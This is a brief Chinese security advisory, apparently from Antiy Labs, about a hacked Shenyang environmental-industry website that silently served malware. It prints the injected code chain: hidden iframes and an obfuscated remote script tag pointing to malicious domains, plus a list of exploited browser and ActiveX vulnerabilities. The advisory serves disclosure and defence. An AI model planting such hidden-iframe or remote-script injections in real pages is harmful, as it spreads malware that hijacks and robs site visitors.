沈阳环保产业网挂马事件(hxxp://www.syepi.com.cn/)被黑客植入病毒,用户如果访问该网站,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。
该网站问题代码:

<iframe width="256" height="120" src="zj.asp" scrollbars="no" resizable="no" frameborder="0"></iframe>
hxxp://www.syepi.com.cn/zj.asp问题框架代码:

<Script Src=hxxp://c.%6E%75clear3.com/css/c.js></Script>;
|
hxxp://3b3.org/c.js问题框架代码:

<iframe src=hxxp://www.jy6732.cn/llsg/45.htm width=0 height=0></iframe>
|
hxxp://www.jy6732.cn/llsg/45.htm问题框架代码

<iframe src=hxxp://www.gg0987.cn/a180/fxx.htm width=100 height=0></Iframe>
|
hxxp://www.gg0987.cn/a180/fxx.htm问题框架代码

MS06-014漏洞
MS08-041漏洞
MS09-002漏洞
新浪DLoader Class ActiveX控件任意文件下载漏洞
暴风影音播放器MPS.StormPlayer漏洞
联众世界GLIEDown2.dll Active控件溢出漏洞
RealPlayer播放器IERPCtl.IERPCtl.1漏洞
Adobe Flash Player SWF文件漏洞
【资料来源:安天实验室】
(威盾新闻中心转载) |